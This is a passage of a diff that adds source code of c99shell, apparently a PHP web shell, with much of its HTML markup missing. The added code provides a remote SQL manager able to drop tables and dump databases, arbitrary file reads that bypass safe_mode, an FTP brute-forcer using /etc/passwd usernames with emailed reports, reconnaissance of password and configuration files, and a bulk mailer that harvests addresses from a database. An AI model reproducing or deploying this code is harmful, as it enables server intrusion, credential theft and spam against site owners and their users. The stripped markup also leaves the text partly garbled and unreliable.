    ";} +echo ""; +$line = explode(" ",$line); +$line[10] = join(" ",array_slice($line,10)); +$line = array_slice($line,0,11); +if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} +$line[] = "KILL"; +$prcs[] = $line; +echo ""; + } +} +} +else +{ +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg("",$ret)) {$ret = str_replace("","",$ret);} +while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} +$ret = convert_cyr_string($ret,"d","w"); +$stack = explode("\n",$ret); +unset($stack[0],$stack[2]); +$stack = array_values($stack); +$head = explode("",$stack[0]); +$head[1] = explode(" ",$head[1]); +$head[1] = $head[1][0]; +$stack = array_slice($stack,1); +unset($head[2]); +$head = array_values($head); +if ($parsesort[1] != "a") {$y = "";} +else {$y = "";} +if ($k > count($head)) {$k = count($head)-1;} +for($i=0;$i".trim($head[$i])."";} +} +$prcs = array(); +foreach ($stack as $line) +{ + if (!empty($line)) + { +echo ""; +$line = explode("",$line); +$line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); +$line[2] = intval(str_replace(" ","",$line[2]))*1024; +$prcs[] = $line; +echo ""; + } +} +} +$head[$k] = "".$head[$k]."".$y; +$v = $processes_sort[0]; +usort($prcs,"tabsort"); +if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} +$tab = array(); +$tab[] = $head; +$tab = array_merge($tab,$prcs); +echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login){$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db){$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { +if (!$sql_server) {echo "NO CONNECTION";} +else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { +$sqlquicklaunch = array(); +$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); +$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); +$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); +$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); +$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); +$sqlquicklaunch[] = array("Logout",$surl."act=sql"); +echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; +if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} +echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} +} +} +else +{ +?>
    Home

    Please, select database
    "; +//Start center panel +$diplay = TRUE; +if ($sql_db) +{ +if (!is_numeric($c)) {$c = 0;} +if ($c == 0) {$c = "no";} +echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; +if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} +echo "
    "; +$acts = array("","dump"); +if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} +elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} +elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} +elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} +elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} +elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} +elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} +elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} +elseif ($sql_tbl_act == "insert") +{ + if ($sql_tbl_insert_radio == 1) + { +$keys = ""; +$akeys = array_keys($sql_tbl_insert); +foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} +if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} +$values = ""; +$i = 0; +foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} +if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} +$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; +$sql_act = "query"; +$sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { +$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); +$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; +$result = mysql_query($sql_query) or print(mysql_smarterror()); +$result = mysql_fetch_array($result, MYSQL_ASSOC); +$sql_act = "query"; +$sql_tbl_act = "browse"; + } +} +if ($sql_act == "query") +{ + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} +} +if (in_array($sql_act,$acts)) +{ + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { +echo ""; +if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} +} +elseif ($sql_act == "dump") +{ + if (empty($submit)) + { +$diplay = FALSE; +echo "
    SQL-Dump:

    "; +echo "DB: 

    "; +$v = join (";",$dmptbls); +echo "Only tables (explode \";\") 1: 

    "; +if ($dump_file) {$tmp = $dump_file;} +else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} +echo "File: 

    "; +echo "Download:  

    "; +echo "Save to file:  "; +echo "



    1 - all, if empty"; +echo "
    "; + } + else + { +$diplay = TRUE; +$set = array(); +$set["sock"] = $sql_sock; +$set["db"] = $sql_db; +$dump_out = "download"; +$set["print"] = 0; +$set["nl2br"] = 0; +$set[""] = 0; +$set["file"] = $dump_file; +$set["add_drop"] = TRUE; +$set["onlytabs"] = array(); +if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} +$ret = mysql_dump($set); +if ($sql_dump_download) +{ +@ob_clean(); +header("Content-type: application/octet-stream"); +header("Content-length: ".strlen($ret)); +header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); +echo $ret; +exit; +} +elseif ($sql_dump_savetofile) +{ +$fp = fopen($sql_dump_file,"w"); +if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} +else +{ + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; +} +} +else {echo "Dump: nothing to do!";} + } +} +if ($diplay) +{ + if (!empty($sql_tbl)) + { +if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} +$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); +$count_row = mysql_fetch_array($count); +mysql_free_result($count); +$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); +$tbl_struct_fields = array(); +while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} +if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} +if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} +if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} +if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} +$perpage = $sql_tbl_le - $sql_tbl_ls; +if (!is_numeric($perpage)) {$perpage = 10;} +$numpages = $count_row[0]/$perpage; +$e = explode(" ",$sql_order); +if (count($e) == 2) +{ +if ($e[0] == "d") {$asc_desc = "DESC";} +else {$asc_desc = "ASC";} +$v = "ORDER BY `".$e[1]."` ".$asc_desc." "; +} +else {$v = "";} +$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; +$result = mysql_query($query) or print(mysql_smarterror()); +echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; +echo "Structure ]   "; +echo "Browse ]   "; +echo "Dump ]   "; +echo "Insert ]   "; +if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} +if ($sql_tbl_act == "insert") +{ +if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} +if (!empty($sql_tbl_insert_radio)) +{ + +} +else +{ + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { +$sql_query = "SELECT * FROM `".$sql_tbl."`"; +$sql_query .= " WHERE".$sql_tbl_insert_q; +$sql_query .= " LIMIT 1;"; +$result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); +$values = mysql_fetch_assoc($result); +mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { +$name = $field["Field"]; +if (empty($sql_tbl_insert_q)) {$v = "";} +echo ""; +$i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; +} +} +if ($sql_tbl_act == "browse") +{ +$sql_tbl_ls = abs($sql_tbl_ls); +$sql_tbl_le = abs($sql_tbl_le); +echo "
    "; +echo "\"Pages\" "; +$b = 0; +for($i=0;$i<$numpages;$i++) +{ + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} +} +if ($i == 0) {echo "empty";} +echo "
    From:  To:  
    "; +echo "
    "; +echo ""; +echo ""; +for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; +} +echo ""; +echo ""; +while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) +{ + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { +$v = htmlspecialchars($v); +if ($v == "") {$v = "NULL";} +echo ""; +$i++; + } + echo ""; + echo ""; +} +mysql_free_result($result); +echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; +} + } + else + { +$result = mysql_query("SHOW TABLE STATUS", $sql_sock); +if (!$result) {echo mysql_smarterror();} +else +{ +echo "
    "; +$i = 0; +$tsize = $trows = 0; +while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) +{ + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; +} +echo ""; +echo ""; +echo ""; +echo ""; +echo ""; +echo ""; +echo ""; +echo ""; +echo ""; +echo ""; +echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; +mysql_free_result($result); +} + } +} +} +} +else +{ +$acts = array("","newdb","serverstatus","servervars","processes","getfile"); +if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { +echo ""; +if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} +else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { +$result = mysql_query("SHOW STATUS", $sql_sock); +echo "
    Server-status variables:

    "; +echo ""; +while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} +echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; +mysql_free_result($result); + } + if ($sql_act == "servervars") + { +$result = mysql_query("SHOW VARIABLES", $sql_sock); +echo "
    Server variables:

    "; +echo ""; +while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} +echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; +mysql_free_result($result); + } + if ($sql_act == "processes") + { +if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} +$result = mysql_query("SHOW PROCESSLIST", $sql_sock); +echo "
    Processes:

    "; +echo ""; +while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} +echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; +mysql_free_result($result); + } + if ($sql_act == "getfile") + { +$tmpdb = $sql_login."_tmpdb"; +$select = mysql_select_db($tmpdb); +if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} +if ($select) +{ +$created = FALSE; +mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); +mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); +$result = mysql_query("SELECT * FROM tmp_file;"); +if (!$result) {echo "Error in reading file (permision denied)!";} +else +{ + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); +} +} +mysql_drop_db($tmpdb); //comment it if you want to leave database + } +} +} + } + echo "
    "; + if ($sql_sock) + { +$affected = @mysql_affected_rows($sql_sock); +if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} +echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { +if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} +elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} +echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { +function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) +{ +if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} +else {$TRUE = TRUE;} +if ($TRUE) +{ + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { +echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; +ob_flush(); +return TRUE; + } +} +} +if (!empty($submit)) +{ +if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} +$fp = fopen("/etc/passwd","r"); +if (!$fp) {echo "Can't get /etc/passwd for password-list.";} +else +{ + if ($fqb_logging) + { +if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} +else {$fqb_logfp = FALSE;} +$fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; +if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { +$str = explode(":",fgets($fp,2048)); +if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) +{ +echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; +$fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; +if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} +$success++; +ob_flush(); +} +if ($i > $fqb_lenght) {break;} +$i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); +} +} +else +{ +$logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; +$logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); +echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; +} + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { +echo "Directory information:"; +if (!$win) +{ +echo "
    Owner/Group "; +$ow = posix_getpwuid(fileowner($d)); +$gr = posix_getgrgid(filegroup($d)); +$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); +} +echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { +if ($nixpasswd) +{ +if ($nixpasswd == 1) {$nixpasswd = 0;} +echo "*nix /etc/passwd:
    "; +if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} +if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} +echo "
    From:  To:  

    "; +$i = $nixpwd_s; +while ($i < $nixpwd_e) +{ + $uid = posix_getpwuid($i); + if ($uid) + { +$uid["dir"] = "".$uid["dir"].""; +echo join(":",$uid)."
    "; + } + $i++; +} +} +else {echo "
    Get /etc/passwd
    ";} + } + else + { +$v = $_SERVER["WINDIR"]."\repair\sam"; +if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} +else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { +if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} +elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} +else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","crc32") as $v) + { +echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { +$debase64 = base64_decode($encoder_input); +$debase64 = str_replace("\0","[0]",$debase64); +$a = explode("\r\n",$debase64); +$rows = count($a); +$debase64 = htmlspecialchars($debase64); +if ($rows == 1) {echo "";} +else {$rows++; echo "";} +echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { +if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } +else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { +if (!empty($rndcode)) {echo "Error: incorrect confimation!";} +$rnd = rand(0,9).rand(0,9).rand(0,9); +echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "mailer") { + + + + +If ($action=="mysql"){ + +$sqlhost = $_POST['sqhost']; +$sqllogin = $_POST['sqlog']; +$sqlpass = $_POST['sqpass']; +$sqldb = $_POST['sqdb']; +$sqlquery =$_POST['sqq']; + + + + if (!$sqlhost || !$sqllogin || !$sqldb || !$sqlquery){ + + print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required."; + + exit; + + } + + $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed."); + + mysql_select_db($sqldb, $db) or die("Could not select database $sqldb"); + + $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery"); + + $numrows = mysql_num_rows($result); + + + + for($x=0; $x<$numrows; $x++){ + + $result_row = mysql_fetch_row($result); + + $oneemail = $result_row[0]; + + $emaillist .= $oneemail."\n"; + + } + + } + + + +if ($action=="send"){ + + $message = urlencode($message); + + $message = ereg_replace("%5C%22", "%22", $message); + + $message = urldecode($message); + $message = stripslashes($message); + $subject = stripslashes($subject); + +} + + + +?> 
    Php Mailer Mod With capacity Of Grabbing Mails From db By Psych0
    +
    +
    + + + +
    +
    +
    +
    + + + + + +
    + + + + + + + + + + +
    + + + + + + + + + + + + + + + + + + + + + +
    From (email): + +
    Name: + +
    Reply-To: + + + +
    Attach File: + +
    Subject: +
    +
    + + + + + + + +
    +
    +
    +Plain + +HTML 
    +

    +
    +
    +
    +
    +
    + + + + + + + +
    Email(s) List

    +  + + + + +
    " Method="Post" onsubmit="document.getElementById('pattes').disabled=false"> +:: Sql Host ::           
    +:: Sql Username ::
    +:: Sql Pass ::           
    +:: Sql db::                
    +:: Query For Grabbing Mails (Don't Touch !) ::
                            +
    +
    + + + + +
    + + +
    +

      +

    + + + + + + +
    + + + + Sending mail to $to.......->oK

    "; + + flush(); + + $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; + + $header .= "MIME-Version: 1.0\r\n"; + + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + + If ($file_name) $header .= "--$uid\r\n"; + + $header .= "Content-Type: text/$contenttype\r\n"; + + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + + $header .= "$message\r\n"; + + If ($file_name) $header .= "--$uid\r\n"; + + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + + If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; + + If ($file_name) $header .= "$content\r\n"; + + If ($file_name) $header .= "--$uid--"; + + mail($to, $subject, "", $header); + +echo ""; +flush(); + + } + + } + + + +} + + + + + + +} + + +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { +$ticket = substr(md5(microtime()+rand(1,1000)),0,6); +$body = "c99shell v.".$shver." feedback #".$ticket."\nName: 